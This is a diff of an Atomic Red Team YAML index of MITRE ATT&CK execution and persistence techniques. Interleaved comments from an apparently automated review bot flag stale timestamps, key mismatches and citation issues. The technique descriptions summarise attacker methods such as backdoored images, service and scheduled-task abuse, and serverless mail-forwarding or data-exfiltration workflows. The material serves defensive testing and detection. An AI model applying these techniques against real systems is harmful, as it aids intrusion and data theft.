url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
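Review bot: the `modified` timestamp for T1204.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-08-26T16:42:35.318Z`, while every other technique in this change moves forward to a 2024 date. A `modified` value earlier than the one already committed almost certainly means this object was regenerated from a stale STIX source rather than the current bundle; check which ATT&CK release it was pulled from before merging.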
@@ -46049,8 +46428,6 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests:
- name: Malicious Execution from Mounted ISO Image
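Review bot: T1204.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` but, unlike the other techniques in this change, gets no `x_mitre_attack_spec_version: 3.2.0` back, and it keeps `x_mitre_permissions_required` (`- User`) that the other reordered objects drop. Together with the `modified` date regressing in the previous hunk this looks like a partial or stale update of one object; it should end up with the same key set as its neighbours.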
@@ -46073,24 +46450,8 @@ execution:
elevation_required: true
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
@@ -46107,9 +46468,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -46117,21 +46479,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
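Review bot: T1203 gains two data sources here (`'File: File Modification'` and `'Network Traffic: Network Traffic Flow'`) and a new `modified` date, yet `x_mitre_version` is re-emitted unchanged at `'1.4'`. If the data-source change is content rather than a serialization artefact, a version bump would normally accompany it; confirm against the upstream object so consumers keyed on version do not miss the change.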
@@ -46181,28 +46559,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -46213,32 +46574,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -46281,7 +46654,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests:
- name: Create and Execute Batch Script
@@ -46460,7 +46832,7 @@ execution:
elevation_required: true
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -46517,11 +46889,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -46586,9 +46957,8 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests:
- name: Visual Basic script execution to gather local computer information
@@ -46696,7 +47066,7 @@ execution:
name: powershell
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -46717,14 +47087,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
@@ -46733,16 +47108,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
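Review bot: the T1648 platform rename from `Office 365` to `Office Suite` is consistent with ATT&CK v16's platform consolidation, but it means any index or filter in this repository still keyed on `Office 365` (or `Google Workspace`) will stop matching this technique; grep the remaining techniques and the per-platform indexes for the old platform names before merging. Separately, `x_mitre_modified_by_ref` is inserted here between `x_mitre_is_subtechnique` and `x_mitre_platforms` (and `x_mitre_attack_spec_version` after `kill_chain_phases` in the previous hunk), whereas every other technique in this change emits both as the last keys of the object; the T1648 object appears to have gone through a different serialization path and will reorder again on the next regeneration.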
@@ -46768,6 +47145,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
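Review bot: the new `OWN-CERT Google App Script 2024` reference is dated `(n.d.)` in its description although the source_name itself says 2024, and the author is written surname-first (`L'Hutereau Arnaud`) while the other entries in this list are written given-name-first (for example `Eric Saraga`, `Matt Muir`); normalise to one form and supply the publication date if the post carries one. The `ressources` path segment in the URL is the site's own spelling and should stay as is.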
@@ -46782,29 +47167,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -46817,25 +47183,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
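Review bot: x_mitre_permissions_required: [User] is removed from T1204.001 with no replacement, while T1053.003 later in this diff keeps its x_mitre_permissions_required: User as untouched context; if the intent is to drop the retired field, do it uniformly across the file, otherwise keep it here. The rest of the hunk re-inserts the fields removed from the top of the object (with url now preceding external_id under external_references) and adds x_mitre_deprecated, x_mitre_remote_support and revoked, which is consistent with the 3.2.0 spec bump.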
@@ -46885,9 +47267,8 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests:
- name: Execute a Command as a Service
@@ -47104,10 +47485,10 @@ execution:
elevation_required: true
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
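Review bot: the new trailing sentence in the T1053.002 description introduces the citation key (Citation: Malicious Life by Cybereason); that key has to match a source_name under this object's external_references exactly, or the citation renders unresolved, so check the matching reference addition lands in the same object before merging. The appended text about `Win32_ScheduledJob` is otherwise a plain mirror of the upstream wording.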
@@ -47170,7 +47551,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -47204,8 +47585,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -47214,6 +47595,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
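Review bot: the url for the new `Malicious Life by Cybereason` reference carries a `#blog-subscribe` fragment that targets the page's subscription widget rather than the article; drop the fragment so the entry resolves to `https://www.cybereason.com/blog/wmi-lateral-movement-win32`. The entry also has an author but (n.d.) for the date; if the upstream record carries a publication date, carry it through rather than leaving it undated.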
@@ -47226,7 +47611,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
@@ -47247,23 +47631,24 @@ execution:
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
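Review bot: the rewritten T1053.005 description drops the sentence about the deprecated at utility being unable to see tasks created with schtasks, yet the context line `can not access tasks created with schtasks` still sits between the removed `Panel. In some cases` line and the new `Panel.(Citation: Stack Overflow)` line, which reads like an orphaned fragment; confirm the regenerated text matches the upstream wording and that the hunk applies without leaving that line behind. Minor: the new text spells `Powershell`, while ATT&CK elsewhere writes `PowerShell`.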
@@ -47310,7 +47695,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -47342,8 +47727,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -47357,6 +47742,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
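Review bot: the new `Red Canary - Atomic Red Team` reference points at this repository's own T1053.005.md via a `blob/master` URL, so the cited page can drift from what the description asserts about `Invoke-CimMethod` and `PS_ScheduledTask`; because this file mirrors upstream ATT&CK the entry should stay as generated, but it is worth noting that the citation is self-referential whenever that test page is edited.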
@@ -47369,11 +47758,14 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -47752,7 +48144,7 @@ persistence:
schtasks /Delete /TN "#{task_name}" /F
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
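Review bot: the modified timestamp for T1205.002 moves backwards (2022-11-08 to 2022-10-20); the same happens for T1133, LC_LOAD_DYLIB Addition, Active Setup and TFTP Boot in this diff, and every superseded value shares the `14:00:00.188Z` (or `14:49:39.188Z`) time component, which suggests the old values were generator-side stamps rather than upstream ones. Confirm the new values are what the upstream STIX bundle carries so the backward moves are deliberate and not a stale source.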
@@ -47815,7 +48207,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -47880,49 +48271,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
